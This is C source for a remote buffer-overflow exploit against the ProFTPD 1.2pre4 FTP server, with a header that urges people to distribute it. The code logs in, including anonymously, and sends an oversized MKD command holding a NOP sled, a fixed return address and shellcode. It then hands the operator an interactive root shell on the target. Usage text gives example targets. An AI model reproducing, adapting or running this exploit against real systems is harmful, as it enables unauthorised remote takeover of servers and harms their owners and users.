/*

                 ProFTPD 1.2pre4 Remote Buffer Overflow Xploit 
                           by wildcoyote@coders-pt.org

  Advisorie (from www.securityfocus.com):

  The vulnerability in 1.2pre1, 1.2pre3 and 1.2pre3 is a remotely exploitable
  buffer overflow, the result of a sprintf() in the log_xfer() routine in src/log.c.
  The vulnerability in -> 1.2pre4 <- is a mkdir overflow. The name of the created
  path can not exceed 255 chars.

  -> UNRELEASED! DISTRIBUTE! <- :] heh

  I'm almost sure that no1 coded a exploit against this version of
  ProFtpd/using the same buffer overflow.

*/

#include <netdb.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <unistd.h>
#include <string.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <errno.h>

#define DELAY 2 // wait 2 secondz before sending each command :]
#define DEFAULT_OFFSET                    0
#define DEFAULT_BUFFER_SIZE             255
#define RETURN_ADDRESS           0xbffff550
#define NOP                            0x90

char shellcode[] =
   "\x90\x90\x31\xc0\x31\xdb\xb0\x17\xcd\x80\x31\xc0\xb0\x17\xcd\x80"
   "\x31\xc0\x31\xdb\xb0\x2e\xcd\x80\xeb\x4f\x31\xc0\x31\xc9\x5e\xb0"
   "\x27\x8d\x5e\x05\xfe\xc5\xb1\xed\xcd\x80\x31\xc0\x8d\x5e\x05\xb0"
   "\x3d\xcd\x80\x31\xc0\xbb\xd2\xd1\xd0\xff\xf7\xdb\x31\xc9\xb1\x10"
   "\x56\x01\xce\x89\x1e\x83\xc6\x03\xe0\xf9\x5e\xb0\x3d\x8d\x5e\x10"
   "\xcd\x80\x31\xc0\x88\x46\x07\x89\x76\x08\x89\x46\x0c\xb0\x0b\x89"
   "\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xe8\xac\xff\xff\xff";

int
openhost(char *host,int port) {
   int sock;
   struct sockaddr_in addr;
   struct hostent *he;
   he=gethostbyname(host);
   if (he==NULL) return -1;
   sock=socket(AF_INET, SOCK_STREAM, getprotobyname("tcp")->p_proto);
   if (sock==-1) return -1;
   memcpy(&addr.sin_addr, he->h_addr, he->h_length);
   addr.sin_family=AF_INET;
   addr.sin_port=htons(port);
   if(connect(sock, (struct sockaddr *)&addr, sizeof(addr)) == -1) sock==-1;
   return sock;
}

void
sends(int sock,char *buf) {
  write(sock,buf,strlen(buf));
}

void
own3dshell(int sock)
{
 char buf[1024];
 fd_set rset;
 int i;
 while (1)
 {
  FD_ZERO(&rset);
  FD_SET(sock,&rset);
  FD_SET(STDIN_FILENO,&rset);
  select(sock+1,&rset,NULL,NULL,NULL);
  if (FD_ISSET(sock,&rset))
  {
   i=read(sock,buf,1024);
   if (i <= 0)
   {
     printf("The connection was closed!\n");
     printf("Exiting...\n\n");
     exit(0);
   }
   buf[i]=0;
   puts(buf);
  }
  if (FD_ISSET(STDIN_FILENO,&rset))
  {
   i=read(STDIN_FILENO,buf,1024);
   if (i>0)
   {
    buf[i]=0;
    write(sock,buf,i);
   }
  }
 }
}

void
own(char *username, char *password, char *writable_dir, char *host, int port, int offset)
{
 char buf[512], *buf_ptr, *ptr;
 long *addr_ptr, addr;
 int bsize=DEFAULT_BUFFER_SIZE+100, sock, i;

 printf("Trying to connect to %s [%d]...",host,port);
 sock=openhost(host,port);
 if (sock==-1)
 {
  printf("FAILED\n");
  printf("Exiting...\n\n");
  exit(-1);
 }
 printf("SUCCESSFULL\n");
 printf("Sending username (%s)...",username);
 snprintf(buf,sizeof(buf),"USER %s\n",username);
 sends(sock,buf);
 printf("DONE\n");
 bzero(buf,strlen(buf));
 sleep(DELAY);
 printf("Sending password (");
 for(i=0;i<strlen(password);i++) printf("*");
 printf(")...");
 snprintf(buf,sizeof(buf),"PASS %s\n",password);
 sends(sock,buf);
 printf("DONE\n");
 bzero(buf,strlen(buf));
 sleep(DELAY);
 printf("CWD %s...",writable_dir);
 snprintf(buf,sizeof(buf),"CWD %s\n",writable_dir);
 sends(sock,buf);
 printf("DONE\n");
 bzero(buf,strlen(buf));
 sleep(DELAY);
 printf("Allocating mem for buffer overflow...\n");
 if (!(buf_ptr=malloc(bsize)))
 {
  printf("Couldn't allocate memory!\n");
  printf("Exiting...\n\n");
  exit(-1);
 }
 printf("Preparing buffer...\n");
 addr=RETURN_ADDRESS-offset;
 ptr=buf_ptr;
 addr_ptr=(long *) ptr;
 for (i=0;i<bsize; i+=4) *(addr_ptr++)=addr;
 for (i=0;i< bsize/2;i++) buf_ptr[i]=NOP;
 ptr=buf_ptr+((bsize/2)-(strlen(shellcode)/2));
 for (i=0;i<strlen(shellcode);i++) *(ptr++)=shellcode[i];
 buf_ptr[bsize-1]='\0';
 snprintf(buf,sizeof(buf),"MKD %s\n",buf_ptr);
 printf("Sending evil'code...\n");
 sends(sock,buf);
 sleep(DELAY);
 printf("Oh k! If all went well, we should have a suid'shell wainting for uz ;)\n");
 printf("Enjoy...\n");
 own3dshell(sock);
}

main(int argc, char *argv[])
{
 printf("\n\tProFtpd 1.2pre4 Remote Xploit by wildcoyote@coders-pt.org\n\n");
 if (argc<5)
 {
  printf("Sintaxe: %s <username> <password> <writable dir> <host> [port] [offset]\n",argv[0]);
  printf("Example:\n\n");
  printf(" -> If you have a account on the box <-\n");
  printf("    %s wildcoyote my_pass /tmp biatx.userfriendly\n",argv[0]);
  printf(" -> Anonymous access on tha box <-\n");
  printf("    %s anonymous whatever@ /incoming 192.168.0.2\n\n",argv[0]);
  printf("If thiz doesn't bind tha own3d'shell, try a offset between 0-3\n");
  printf("Regardz, wildcoyote@coders-pt.org\n\n");
 }
 else if (argc==5) own(argv[1],argv[2],argv[3],argv[4],21,DEFAULT_OFFSET);
      else if (argc==6) own(argv[1],argv[2],argv[3],argv[4],atoi(argv[5]),DEFAULT_OFFSET);
           else own(argv[1],argv[2],argv[3],argv[4],atoi(argv[5]),atoi(argv[6]));
}